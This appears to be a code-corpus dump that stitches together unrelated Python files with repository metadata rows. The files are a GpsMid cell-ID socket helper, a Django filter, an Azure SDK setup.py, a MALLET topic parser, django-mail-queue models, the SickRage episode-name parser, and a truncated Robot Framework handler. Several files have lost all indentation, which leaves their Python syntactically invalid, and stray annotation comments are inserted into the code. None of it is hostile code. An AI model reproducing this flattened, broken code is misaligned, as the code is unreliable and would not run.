threading.Thread.__init__(self)
try:
print('Starting up Socket ')
self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.serversocket.bind(("localhost", 59721))
self.serversocket.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
self.serversocket.listen(1)
except socket.error, msg:
self.serversocket = None
print('Failed ' + str(msg));
self.app = app
self.exit_flag = 0
def run(self):
while not self.exit_flag:
print('Waiting for socket connection')
(clientsocket, address) = self.serversocket.accept()
print('Got connection!')
try:
while 1:
cmdS = ''
while len(cmdS) < 4:
chunk = clientsocket.recv(4);
cmdS = cmdS + chunk
                        print('Cmd received so far: ' + str(len(cmdS)) + ' ' + cmdS)
if len(chunk) == 0:
raise socket.error, "socket connection broken"
cmd = struct.unpack('>i',cmdS)
if (cmd[0] == 6574723):
signal = 0;
msg = struct.pack('>iiiih', self.app.db.mcc, self.app.db.mnc, self.app.db.lac, self.app.db.cellid, signal) + '\n'
totalsent = 0
msglen = len(msg)
while totalsent < msglen:
sent = clientsocket.send(msg[totalsent:])
if sent == 0:
raise socket.error, "socket connection broken"
totalsent = totalsent + sent
except socket.error, msg:
clientsocket = None
self.exit_flag = 0
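# Added annotation (the peer is not part of this file): a client of the socket
# above sends the 4-byte big-endian command 6574723 and reads back a 19-byte
# reply -- struct.pack('>iiiih', mcc, mnc, lac, cellid, signal) followed by a
# newline.  A hypothetical peer could decode it with, for example:
#
#     mcc, mnc, lac, cellid, signal = struct.unpack('>iiiih', reply[:18])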
class gsm_location_app:
def __init__(self):
self.lock = e32.Ao_lock()
self.old_title = appuifw.app.title
appuifw.app.title = u"GSM Location"
self.exit_flag = False
appuifw.app.exit_key_handler = self.abort
self.db = gsm_location()
appuifw.app.body = appuifw.Text()
appuifw.app.menu = [(u"Refresh", self.refresh)]
def loop(self):
try:
self.refresh()
e32.ao_sleep(1)
while not self.exit_flag:
self.refresh()
e32.ao_sleep(1)
finally:
self.db.close()
def close(self):
appuifw.app.menu = []
appuifw.app.body = None
appuifw.app.exit_key_handler = None
appuifw.app.title = self.old_title
def abort(self):
# Exit-key handler.
self.exit_flag = True
self.lock.signal()
def refresh(self):
self.db.gsm_location()
appuifw.app.body.set(self.db.text)
def main():
app = gsm_location_app()
c = Client(app)
c.start()
try:
app.loop()
finally:
app.close()
if __name__ == "__main__":
main()
| papousek/GpsMid | S60cellID_helper.py | Python | gpl-2.0 | 3,251 |
#from . import mod
from .comp1 import CONF
from .comp2 import CONF
| simone-campagna/daikon | test_zirkon/pack4/__init__.py | Python | apache-2.0 | 68 |
#!/usr/bin/env python
# encoding: utf-8
from django import template
register = template.Library()
@register.filter(name='yes_no')
def yes_no(bool_value, show_str):
if bool_value:
return show_str.partition('/')[0]
else:
return show_str.partition('/')[2]
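# Usage sketch (added annotation; the variable and label names are made up):
# after {% load myfilters %} a template can render
#
#     {{ is_open|yes_no:"open/closed" }}
#
# which shows "open" when is_open is truthy and "closed" otherwise.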
| its-django/mysite-django18 | mysite/restaurants/templatetags/myfilters.py | Python | apache-2.0 | 281 |
#!/usr/bin/env python
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import re
import os.path
from io import open
from setuptools import find_packages, setup
# Change the PACKAGE_NAME only to change folder and different name
PACKAGE_NAME = "azure-mgmt-maintenance"
PACKAGE_PPRINT_NAME = "Maintenance Management"
# a-b-c => a/b/c
package_folder_path = PACKAGE_NAME.replace('-', '/')
# a-b-c => a.b.c
namespace_name = PACKAGE_NAME.replace('-', '.')
# Version extraction inspired from 'requests'
with open(os.path.join(package_folder_path, 'version.py')
if os.path.exists(os.path.join(package_folder_path, 'version.py'))
else os.path.join(package_folder_path, '_version.py'), 'r') as fd:
version = re.search(r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]',
fd.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError('Cannot find version information')
with open('README.md', encoding='utf-8') as f:
readme = f.read()
with open('CHANGELOG.md', encoding='utf-8') as f:
changelog = f.read()
setup(
name=PACKAGE_NAME,
version=version,
description='Microsoft Azure {} Client Library for Python'.format(PACKAGE_PPRINT_NAME),
long_description=readme + '\n\n' + changelog,
long_description_content_type='text/markdown',
license='MIT License',
author='Microsoft Corporation',
author_email='[email protected]',
url='https://github.com/Azure/azure-sdk-for-python',
keywords="azure, azure sdk", # update with search keywords relevant to the azure service / product
classifiers=[
'Development Status :: 4 - Beta',
'Programming Language :: Python',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
'License :: OSI Approved :: MIT License',
],
zip_safe=False,
packages=find_packages(exclude=[
'tests',
# Exclude packages that will be covered by PEP420 or nspkg
'azure',
'azure.mgmt',
]),
install_requires=[
'msrest>=0.6.21',
'azure-common~=1.1',
'azure-mgmt-core>=1.3.0,<2.0.0',
],
python_requires=">=3.6"
)
| Azure/azure-sdk-for-python | sdk/maintenance/azure-mgmt-maintenance/setup.py | Python | mit | 2,678 |
from sys import exit, stderr, argv
from collections import defaultdict, Counter
import json
import random
def parse_mallet_topics(fname) :
tmp = []
with open(fname) as f :
for line in f :
tmp.append(line.strip().split('\t')[2:])
return tmp
def parse_mallet_topics_annotated(fname) :
tmp = []
with open(fname) as f :
for line in f :
dat = line.strip().split('\t')
tmp.append((dat[0], dat[3:]))
return tmp
def parse_mallet_articles(fname) :
tmp = defaultdict(list)
with open(fname) as f :
f.readline() # header
linenum = 2
for line in f :
data = line.strip().split("\t")
article = int(data[0])
for i in range(2, len(data), 2) :
try :
topic_id = int(data[i])
topic_prob = float(data[i+1])
tmp[article].append((topic_id, topic_prob))
except ValueError, ve :
print >> stderr, "Error on line %d (%s)" % (linenum, str(ve))
exit(1)
linenum += 1
return tmp
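# Added annotation: the composition file is MALLET's doc-topics output -- one
# header line, then per document an index, a source field, and alternating
# (topic id, topic proportion) columns, which is why the loop above walks
# data[2:] two fields at a time.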
def main() :
verbose = False
if len(argv) != 4 :
        print >> stderr, "Usage: %s <key file> <composition file> <n>" % argv[0]
print >> stderr, "\t we assume that the key file has an additional column prepended of human annotations"
print >> stderr, "\t n = number of docs to print out"
exit(1)
key_file = argv[1]
composition_file = argv[2]
num_to_print = int(argv[3])
# arxiv_topics = json.load(open("../linrel_topics.json"))
# print "read %d arxiv articles+topics" % len(arxiv_topics)
#
# machine_learning_articles = [ a for a in arxiv_topics if 'stat.ML' in arxiv_topics[a] ]
# print "\t%d/%d arxiv articles are from stat.ML" % (len(machine_learning_articles), len(arxiv_topics))
#mallet_topics = parse_mallet_topics("80000keys.txt")
mallet_topics = parse_mallet_topics_annotated(key_file)
if verbose :
print "read %d mallet topics" % len(mallet_topics)
ambiguous_topics = [ index for index,value in enumerate(mallet_topics) if 'ambiguous' in value[0] ]
if verbose :
print "\t%d/%d mallets topics were ambiguous" % (len(ambiguous_topics), len(mallet_topics))
mallet_articles = parse_mallet_articles(composition_file)
if verbose :
print "read %d mallet articles" % len(mallet_articles)
# ml_topics = Counter()
#
# for mla in machine_learning_articles :
# topic_id, topic_prob = mallet_articles[mla][0]
# ml_topics[topic_id] += 1
#
# print "%d/%d topics are related to articles from stat.ML" % (len(ml_topics), len(mallet_topics))
# ml_filename = 'machine_learning_topics.txt'
#
# with open(ml_filename, 'w') as f :
# for t in ml_topics :
# print >> f, " ".join([ str(t), str(ml_topics[t]) ] + mallet_topics[t][1])
#
# print "wrote %s" % ml_filename
article2topic = {}
topic_choice = []
for aid in sorted(mallet_articles.keys()) :
for index,value in enumerate(mallet_articles[aid]) :
tid,tprob = value
if tid not in ambiguous_topics :
article2topic[aid] = tid
topic_choice.append(index)
break
if verbose :
for i in sorted(set(topic_choice)) :
print "\t%d/%d mallet articles were assigned %d-th topic" % (topic_choice.count(i), len(mallet_articles), i)
article_and_query = []
weak_topics = ('probability', 'inference', 'vision', 'theory', 'optimisation', 'dimensionality', 'likelihood', 'speech')
for article,topic in article2topic.items() :
topic = mallet_topics[topic][0]
#print article,topic
if topic.startswith('ml') and ('generic' not in topic) and ('?' not in topic) :
query = topic.replace('/', ' ').replace('ml', 'machine learning').replace('nlp', 'natural language processing')
ignore = False
for wt in weak_topics :
if wt in query :
ignore = True
break
if ignore :
continue
article_and_query.append((article, "'%s'" % query))
random.seed(37)
random.shuffle(article_and_query)
for a,q in article_and_query[:num_to_print] :
print a,q
return 0
if __name__ == '__main__' :
try :
exit(main())
except KeyboardInterrupt :
print >> stderr, "Killed by user"
exit(1)
| genie9/pulp | parse_mallet.py | Python | gpl-3.0 | 4,601 |
# -*- coding: utf-8 -*-
# **********************************************************************
#
# Copyright (c) 2003-2017 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************
TestSuite(__file__, [IceGridTestCase()], multihost=False) | ljx0305/ice | cpp/test/IceGrid/activation/test.py | Python | gpl-2.0 | 414 |
import datetime
import logging
import os
from django.conf import settings
from django.core.files.base import ContentFile
from django.core.mail import EmailMultiAlternatives
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from . import defaults
from .utils import get_storage, upload_to
logger = logging.getLogger(__name__)
class MailerMessageManager(models.Manager):
def send_queued(self, limit=None):
if limit is None:
limit = getattr(settings, 'MAILQUEUE_LIMIT', defaults.MAILQUEUE_LIMIT)
for email in self.filter(sent=False)[:limit]:
email.send_mail()
def clear_sent_messages(self, offset=None):
""" Deletes sent MailerMessage records """
if offset is None:
offset = getattr(settings, 'MAILQUEUE_CLEAR_OFFSET', defaults.MAILQUEUE_CLEAR_OFFSET)
if type(offset) is int:
offset = datetime.timedelta(hours=offset)
delete_before = timezone.now() - offset
self.filter(sent=True, last_attempt__lte=delete_before).delete()
@python_2_unicode_compatible
class MailerMessage(models.Model):
created = models.DateTimeField(_('Created'), auto_now_add=True, auto_now=False,
editable=False, null=True)
subject = models.CharField(_('Subject'), max_length=250, blank=True)
to_address = models.TextField(_('To'))
cc_address = models.TextField(_('CC'), blank=True)
bcc_address = models.TextField(_('BCC'), blank=True)
from_address = models.EmailField(_('From'), max_length=250)
reply_to = models.TextField(_('Reply to'), max_length=250, blank=True, null=True)
content = models.TextField(_('Content'), blank=True)
html_content = models.TextField(_('HTML Content'), blank=True)
app = models.CharField(_('App'), max_length=250, blank=True)
sent = models.BooleanField(_('Sent'), default=False, editable=False)
last_attempt = models.DateTimeField(_('Last attempt'), auto_now=False, auto_now_add=False,
blank=True, null=True, editable=False)
objects = MailerMessageManager()
class Meta:
verbose_name = _('Message')
verbose_name_plural = _('Messages')
def __str__(self):
return self.subject
def add_attachment(self, attachment):
"""
Takes a Django `File` object and creates an attachment for this mailer message.
"""
if self.pk is None:
self._save_without_sending()
original_filename = attachment.file.name.split(os.sep)[-1]
file_content = ContentFile(attachment.read())
new_attachment = Attachment()
new_attachment.file_attachment.save(original_filename, file_content, save=False)
new_attachment.email = self
new_attachment.original_filename = original_filename
try:
new_attachment.save()
except Exception as e:
logger.error(e)
new_attachment.file_attachment.delete()
def _save_without_sending(self, *args, **kwargs):
"""
Saves the MailerMessage instance without sending the e-mail. This ensures
other models (e.g. `Attachment`) have something to relate to in the database.
"""
self.do_not_send = True
super(MailerMessage, self).save(*args, **kwargs)
    def send_mail(self):
        """ Public API to send mail. Determines whether or not to use Celery
        and then calls the appropriate method.
"""
if getattr(settings, 'MAILQUEUE_CELERY', defaults.MAILQUEUE_CELERY):
from mailqueue.tasks import send_mail
send_mail.delay(self.pk)
else:
self._send()
def _send(self):
if not self.sent:
self.last_attempt = timezone.now()
subject, from_email = self.subject, self.from_address
text_content = self.content
msg = EmailMultiAlternatives(subject, text_content, from_email)
if self.reply_to:
msg.reply_to = [email.strip() for email in self.reply_to.split(',')
if email.strip()]
if self.html_content:
html_content = self.html_content
msg.attach_alternative(html_content, "text/html")
msg.to = [email.strip() for email in self.to_address.split(',') if email.strip()]
msg.cc = [email.strip() for email in self.cc_address.split(',') if email.strip()]
msg.bcc = [email.strip() for email in self.bcc_address.split(',') if email.strip()]
# Add any additional attachments
for attachment in self.attachment_set.all():
path = attachment.file_attachment.path
if os.path.isfile(path):
with open(path, 'rb') as f:
content = f.read()
msg.attach(attachment.original_filename, content, None)
try:
msg.send()
self.sent = True
except Exception as e:
self.do_not_send = True
logger.error('Mail Queue Exception: {0}'.format(e))
self.save()
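# Usage sketch (added annotation; the addresses are placeholders): a message is
# queued by saving a MailerMessage and delivered either inline or via Celery,
# depending on the MAILQUEUE_CELERY setting:
#
#     msg = MailerMessage(subject="Hello", to_address="[email protected]",
#                         from_address="[email protected]", content="Plain body",
#                         html_content="<p>HTML body</p>")
#     msg.save()
#     msg.send_mail()          # or later: MailerMessage.objects.send_queued()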
@python_2_unicode_compatible
class Attachment(models.Model):
file_attachment = models.FileField(storage=get_storage(), upload_to=upload_to,
blank=True, null=True)
original_filename = models.CharField(default=None, max_length=250, blank=False)
email = models.ForeignKey(MailerMessage, on_delete=models.CASCADE, blank=True, null=True)
class Meta:
verbose_name = _('Attachment')
verbose_name_plural = _('Attachments')
def __str__(self):
return str(self.original_filename)
| dstegelman/django-mail-queue | mailqueue/models.py | Python | mit | 5,874 |
# coding=utf-8
# Author: Nic Wolfe <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import os
import time
import re
import os.path
import regexes
import sickbeard
from sickbeard import logger, helpers, scene_numbering, common, scene_exceptions, db
from sickrage.helper.encoding import ek
from sickrage.helper.exceptions import ex
from dateutil import parser
class NameParser(object):
ALL_REGEX = 0
NORMAL_REGEX = 1
ANIME_REGEX = 2
def __init__(self, file_name=True, showObj=None, tryIndexers=False, naming_pattern=False):
self.file_name = file_name
self.showObj = showObj
self.tryIndexers = tryIndexers
self.naming_pattern = naming_pattern
if self.showObj and not self.showObj.is_anime:
self._compile_regexes(self.NORMAL_REGEX)
elif self.showObj and self.showObj.is_anime:
self._compile_regexes(self.ANIME_REGEX)
else:
self._compile_regexes(self.ALL_REGEX)
@staticmethod
def clean_series_name(series_name):
"""Cleans up series name by removing any . and _
characters, along with any trailing hyphens.
Is basically equivalent to replacing all _ and . with a
space, but handles decimal numbers in string, for example:
        >>> clean_series_name("an.example.1.0.test")
        'an example 1.0 test'
        >>> clean_series_name("an_example_1.0_test")
        'an example 1.0 test'
Stolen from dbr's tvnamer
"""
series_name = re.sub(r"(\D)\.(?!\s)(\D)", "\\1 \\2", series_name)
series_name = re.sub(r"(\d)\.(\d{4})", "\\1 \\2", series_name) # if it ends in a year then don't keep the dot
series_name = re.sub(r"(\D)\.(?!\s)", "\\1 ", series_name)
series_name = re.sub(r"\.(?!\s)(\D)", " \\1", series_name)
series_name = series_name.replace("_", " ")
series_name = re.sub(r"-$", "", series_name)
series_name = re.sub(r"^\[.*\]", "", series_name)
return series_name.strip()
def _compile_regexes(self, regexMode):
if regexMode == self.ANIME_REGEX:
dbg_str = u"ANIME"
uncompiled_regex = [regexes.anime_regexes]
elif regexMode == self.NORMAL_REGEX:
dbg_str = u"NORMAL"
uncompiled_regex = [regexes.normal_regexes]
else:
dbg_str = u"ALL"
uncompiled_regex = [regexes.normal_regexes, regexes.anime_regexes]
self.compiled_regexes = []
for regexItem in uncompiled_regex:
for cur_pattern_num, (cur_pattern_name, cur_pattern) in enumerate(regexItem):
try:
cur_regex = re.compile(cur_pattern, re.VERBOSE | re.IGNORECASE)
except re.error, errormsg:
logger.log(u"WARNING: Invalid episode_pattern using %s regexs, %s. %s" % (dbg_str, errormsg, cur_pattern))
else:
self.compiled_regexes.append((cur_pattern_num, cur_pattern_name, cur_regex))
def _parse_string(self, name):
if not name:
return
matches = []
bestResult = None
for (cur_regex_num, cur_regex_name, cur_regex) in self.compiled_regexes:
match = cur_regex.match(name)
if not match:
continue
result = ParseResult(name)
result.which_regex = [cur_regex_name]
result.score = 0 - cur_regex_num
named_groups = match.groupdict().keys()
if 'series_name' in named_groups:
result.series_name = match.group('series_name')
if result.series_name:
result.series_name = self.clean_series_name(result.series_name)
result.score += 1
if 'series_num' in named_groups and match.group('series_num'):
result.score += 1
if 'season_num' in named_groups:
tmp_season = int(match.group('season_num'))
if cur_regex_name == 'bare' and tmp_season in (19, 20):
continue
result.season_number = tmp_season
result.score += 1
if 'ep_num' in named_groups:
ep_num = self._convert_number(match.group('ep_num'))
if 'extra_ep_num' in named_groups and match.group('extra_ep_num'):
result.episode_numbers = range(ep_num, self._convert_number(match.group('extra_ep_num')) + 1)
result.score += 1
else:
result.episode_numbers = [ep_num]
result.score += 1
if 'ep_ab_num' in named_groups:
ep_ab_num = self._convert_number(match.group('ep_ab_num'))
if 'extra_ab_ep_num' in named_groups and match.group('extra_ab_ep_num'):
result.ab_episode_numbers = range(ep_ab_num,
self._convert_number(match.group('extra_ab_ep_num')) + 1)
result.score += 1
else:
result.ab_episode_numbers = [ep_ab_num]
result.score += 1
if 'air_date' in named_groups:
air_date = match.group('air_date')
try:
result.air_date = parser.parse(air_date, fuzzy=True).date()
result.score += 1
except Exception:
continue
if 'extra_info' in named_groups:
tmp_extra_info = match.group('extra_info')
# Show.S04.Special or Show.S05.Part.2.Extras is almost certainly not every episode in the season
if tmp_extra_info and cur_regex_name == 'season_only' and re.search(
r'([. _-]|^)(special|extra)s?\w*([. _-]|$)', tmp_extra_info, re.I):
continue
result.extra_info = tmp_extra_info
result.score += 1
if 'release_group' in named_groups:
result.release_group = match.group('release_group')
result.score += 1
if 'version' in named_groups:
# assigns version to anime file if detected using anime regex. Non-anime regex receives -1
version = match.group('version')
if version:
result.version = version
else:
result.version = 1
else:
result.version = -1
matches.append(result)
if len(matches):
# pick best match with highest score based on placement
bestResult = max(sorted(matches, reverse=True, key=lambda x: x.which_regex), key=lambda x: x.score)
show = None
if not self.naming_pattern:
# try and create a show object for this result
show = helpers.get_show(bestResult.series_name, self.tryIndexers)
# confirm passed in show object indexer id matches result show object indexer id
if show:
if self.showObj and show.indexerid != self.showObj.indexerid:
show = None
bestResult.show = show
elif not show and self.showObj:
bestResult.show = self.showObj
# if this is a naming pattern test or result doesn't have a show object then return best result
if not bestResult.show or self.naming_pattern:
return bestResult
# get quality
bestResult.quality = common.Quality.nameQuality(name, bestResult.show.is_anime)
new_episode_numbers = []
new_season_numbers = []
new_absolute_numbers = []
# if we have an air-by-date show then get the real season/episode numbers
if bestResult.is_air_by_date:
airdate = bestResult.air_date.toordinal()
myDB = db.DBConnection()
sql_result = myDB.select(
"SELECT season, episode FROM tv_episodes WHERE showid = ? and indexer = ? and airdate = ?",
[bestResult.show.indexerid, bestResult.show.indexer, airdate])
season_number = None
episode_numbers = []
if sql_result:
season_number = int(sql_result[0][0])
episode_numbers = [int(sql_result[0][1])]
if not season_number or not len(episode_numbers):
try:
lINDEXER_API_PARMS = sickbeard.indexerApi(bestResult.show.indexer).api_params.copy()
if bestResult.show.lang:
lINDEXER_API_PARMS['language'] = bestResult.show.lang
t = sickbeard.indexerApi(bestResult.show.indexer).indexer(**lINDEXER_API_PARMS)
epObj = t[bestResult.show.indexerid].airedOn(bestResult.air_date)[0]
season_number = int(epObj["seasonnumber"])
episode_numbers = [int(epObj["episodenumber"])]
except sickbeard.indexer_episodenotfound:
logger.log(u"Unable to find episode with date " + str(bestResult.air_date) + " for show " + bestResult.show.name + ", skipping", logger.WARNING)
episode_numbers = []
except sickbeard.indexer_error, e:
logger.log(u"Unable to contact " + sickbeard.indexerApi(bestResult.show.indexer).name + ": " + ex(e), logger.WARNING)
episode_numbers = []
for epNo in episode_numbers:
s = season_number
e = epNo
if bestResult.show.is_scene:
(s, e) = scene_numbering.get_indexer_numbering(bestResult.show.indexerid,
bestResult.show.indexer,
season_number,
epNo)
new_episode_numbers.append(e)
new_season_numbers.append(s)
elif bestResult.show.is_anime and len(bestResult.ab_episode_numbers):
scene_season = scene_exceptions.get_scene_exception_by_name(bestResult.series_name)[1]
for epAbsNo in bestResult.ab_episode_numbers:
a = epAbsNo
if bestResult.show.is_scene:
a = scene_numbering.get_indexer_absolute_numbering(bestResult.show.indexerid,
bestResult.show.indexer, epAbsNo,
True, scene_season)
(s, e) = helpers.get_all_episodes_from_absolute_number(bestResult.show, [a])
new_absolute_numbers.append(a)
new_episode_numbers.extend(e)
new_season_numbers.append(s)
elif bestResult.season_number and len(bestResult.episode_numbers):
for epNo in bestResult.episode_numbers:
s = bestResult.season_number
e = epNo
if bestResult.show.is_scene:
(s, e) = scene_numbering.get_indexer_numbering(bestResult.show.indexerid,
bestResult.show.indexer,
bestResult.season_number,
epNo)
if bestResult.show.is_anime:
a = helpers.get_absolute_number_from_season_and_episode(bestResult.show, s, e)
if a:
new_absolute_numbers.append(a)
new_episode_numbers.append(e)
new_season_numbers.append(s)
            # need to do a quick sanity check here. It's possible that we now have episodes
# from more than one season (by tvdb numbering), and this is just too much
# for sickbeard, so we'd need to flag it.
new_season_numbers = list(set(new_season_numbers)) # remove duplicates
if len(new_season_numbers) > 1:
raise InvalidNameException("Scene numbering results episodes from "
"seasons %s, (i.e. more than one) and "
"sickrage does not support this. "
"Sorry." % (str(new_season_numbers)))
            # I guess it's possible that we'd have duplicate episodes too, so let's
# eliminate them
new_episode_numbers = list(set(new_episode_numbers))
new_episode_numbers.sort()
# maybe even duplicate absolute numbers so why not do them as well
new_absolute_numbers = list(set(new_absolute_numbers))
new_absolute_numbers.sort()
if len(new_absolute_numbers):
bestResult.ab_episode_numbers = new_absolute_numbers
if len(new_season_numbers) and len(new_episode_numbers):
bestResult.episode_numbers = new_episode_numbers
bestResult.season_number = new_season_numbers[0]
if bestResult.show.is_scene:
logger.log(
u"Converted parsed result " + bestResult.original_name + " into " + str(bestResult).decode('utf-8',
'xmlcharrefreplace'),
logger.DEBUG)
# CPU sleep
time.sleep(0.02)
return bestResult
def _combine_results(self, first, second, attr):
# if the first doesn't exist then return the second or nothing
if not first:
if not second:
return None
else:
return getattr(second, attr)
# if the second doesn't exist then return the first
if not second:
return getattr(first, attr)
a = getattr(first, attr)
b = getattr(second, attr)
# if a is good use it
if a is not None or (isinstance(a, list) and a):
return a
# if not use b (if b isn't set it'll just be default)
else:
return b
@staticmethod
def _unicodify(obj, encoding="utf-8"):
if isinstance(obj, basestring):
if not isinstance(obj, unicode):
obj = unicode(obj, encoding, 'replace')
return obj
@staticmethod
def _convert_number(org_number):
"""
Convert org_number into an integer
org_number: integer or representation of a number: string or unicode
Try force converting to int first, on error try converting from Roman numerals
returns integer or 0
"""
try:
# try forcing to int
if org_number:
number = int(org_number)
else:
number = 0
except Exception:
# on error try converting from Roman numerals
roman_to_int_map = (
('M', 1000), ('CM', 900), ('D', 500), ('CD', 400), ('C', 100),
('XC', 90), ('L', 50), ('XL', 40), ('X', 10),
('IX', 9), ('V', 5), ('IV', 4), ('I', 1)
)
roman_numeral = str(org_number).upper()
number = 0
index = 0
for numeral, integer in roman_to_int_map:
while roman_numeral[index:index + len(numeral)] == numeral:
number += integer
index += len(numeral)
return number
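        # Added annotation -- worked examples of the conversion above:
        #   _convert_number("7")   == 7    (plain integer string)
        #   _convert_number("XIV") == 14   (Roman numerals)
        #   _convert_number(None)  == 0    (falsy input)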
def parse(self, name, cache_result=True):
name = self._unicodify(name)
if self.naming_pattern:
cache_result = False
cached = name_parser_cache.get(name)
if cached:
return cached
# break it into parts if there are any (dirname, file name, extension)
dir_name, file_name = ek(os.path.split, name)
if self.file_name:
base_file_name = helpers.remove_extension(file_name)
else:
base_file_name = file_name
# set up a result to use
final_result = ParseResult(name)
# try parsing the file name
file_name_result = self._parse_string(base_file_name)
# use only the direct parent dir
dir_name = os.path.basename(dir_name)
# parse the dirname for extra info if needed
dir_name_result = self._parse_string(dir_name)
# build the ParseResult object
final_result.air_date = self._combine_results(file_name_result, dir_name_result, 'air_date')
# anime absolute numbers
final_result.ab_episode_numbers = self._combine_results(file_name_result, dir_name_result, 'ab_episode_numbers')
# season and episode numbers
final_result.season_number = self._combine_results(file_name_result, dir_name_result, 'season_number')
final_result.episode_numbers = self._combine_results(file_name_result, dir_name_result, 'episode_numbers')
# if the dirname has a release group/show name I believe it over the filename
final_result.series_name = self._combine_results(dir_name_result, file_name_result, 'series_name')
final_result.extra_info = self._combine_results(dir_name_result, file_name_result, 'extra_info')
final_result.release_group = self._combine_results(dir_name_result, file_name_result, 'release_group')
final_result.version = self._combine_results(dir_name_result, file_name_result, 'version')
final_result.which_regex = []
if final_result == file_name_result:
final_result.which_regex = file_name_result.which_regex
elif final_result == dir_name_result:
final_result.which_regex = dir_name_result.which_regex
else:
if file_name_result:
final_result.which_regex += file_name_result.which_regex
if dir_name_result:
final_result.which_regex += dir_name_result.which_regex
final_result.show = self._combine_results(file_name_result, dir_name_result, 'show')
final_result.quality = self._combine_results(file_name_result, dir_name_result, 'quality')
if not final_result.show:
raise InvalidShowException(
"Unable to parse " + name.encode(sickbeard.SYS_ENCODING, 'xmlcharrefreplace'))
# if there's no useful info in it then raise an exception
if final_result.season_number is None and not final_result.episode_numbers and final_result.air_date is None and not final_result.ab_episode_numbers and not final_result.series_name:
raise InvalidNameException("Unable to parse " + name.encode(sickbeard.SYS_ENCODING, 'xmlcharrefreplace'))
if cache_result:
name_parser_cache.add(name, final_result)
logger.log(u"Parsed " + name + " into " + str(final_result).decode('utf-8', 'xmlcharrefreplace'), logger.DEBUG)
return final_result
class ParseResult(object):
def __init__(self,
original_name,
series_name=None,
season_number=None,
episode_numbers=None,
extra_info=None,
release_group=None,
air_date=None,
ab_episode_numbers=None,
show=None,
score=None,
quality=None,
version=None
):
self.original_name = original_name
self.series_name = series_name
self.season_number = season_number
if not episode_numbers:
self.episode_numbers = []
else:
self.episode_numbers = episode_numbers
if not ab_episode_numbers:
self.ab_episode_numbers = []
else:
self.ab_episode_numbers = ab_episode_numbers
if not quality:
self.quality = common.Quality.UNKNOWN
else:
self.quality = quality
self.extra_info = extra_info
self.release_group = release_group
self.air_date = air_date
self.which_regex = []
self.show = show
self.score = score
self.version = version
def __eq__(self, other):
if not other:
return False
if self.series_name != other.series_name:
return False
if self.season_number != other.season_number:
return False
if self.episode_numbers != other.episode_numbers:
return False
if self.extra_info != other.extra_info:
return False
if self.release_group != other.release_group:
return False
if self.air_date != other.air_date:
return False
if self.ab_episode_numbers != other.ab_episode_numbers:
return False
if self.show != other.show:
return False
if self.score != other.score:
return False
if self.quality != other.quality:
return False
if self.version != other.version:
return False
return True
def __str__(self):
if self.series_name is not None:
to_return = self.series_name + u' - '
else:
to_return = u''
if self.season_number is not None:
to_return += 'S' + str(self.season_number).zfill(2)
if self.episode_numbers and len(self.episode_numbers):
for e in self.episode_numbers:
to_return += 'E' + str(e).zfill(2)
if self.is_air_by_date:
to_return += str(self.air_date)
if self.ab_episode_numbers:
to_return += ' [ABS: ' + str(self.ab_episode_numbers) + ']'
if self.version and self.is_anime is True:
to_return += ' [ANIME VER: ' + str(self.version) + ']'
if self.release_group:
to_return += ' [GROUP: ' + self.release_group + ']'
to_return += ' [ABD: ' + str(self.is_air_by_date) + ']'
to_return += ' [ANIME: ' + str(self.is_anime) + ']'
to_return += ' [whichReg: ' + str(self.which_regex) + ']'
return to_return.encode('utf-8')
@property
def is_air_by_date(self):
if self.air_date:
return True
return False
@property
def is_anime(self):
if len(self.ab_episode_numbers):
return True
return False
class NameParserCache(object):
_previous_parsed = {}
_cache_size = 100
def add(self, name, parse_result):
self._previous_parsed[name] = parse_result
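        # Evict entries once the cache grows past _cache_size; a plain dict is
        # used, so the eviction order is arbitrary rather than strictly LRU.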
while len(self._previous_parsed) > self._cache_size:
del self._previous_parsed[self._previous_parsed.keys()[0]]
def get(self, name):
if name in self._previous_parsed:
logger.log(u"Using cached parse result for: " + name, logger.DEBUG)
return self._previous_parsed[name]
name_parser_cache = NameParserCache()
class InvalidNameException(Exception):
"The given release name is not valid"
class InvalidShowException(Exception):
"The given show name is not valid"
| Maximilian-Reuter/SickRage | sickbeard/name_parser/parser.py | Python | gpl-3.0 | 24,215 |
# Copyright 2008-2013 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robot.errors import DataError
class XmlElementHandler(object):
def __init__(self, execution_result, root_handler=None):
self._stack = [(execution_result, root_handler or RootHandler())]
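    # start()/end() act as SAX-style callbacks: start() pushes the
    # (result, handler) pair produced by the current handler for the new
    # element, end() pops it and lets that handler finish the element.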
def start(self, elem):
result, handler = self._stack[-1]
self._stack.append(handler.handle_child(elem, result))
def end(self, elem):
result, handler = self._stack.pop()
handler.end(elem, result)
class _Handler(object):
def __init__(self):
self._child_map = dict((c.tag, c) for c in self._children())
def _children(self):
return []
def handle_child(self, elem, result):
try:
handler = self._child_map[elem.tag]
except KeyError:
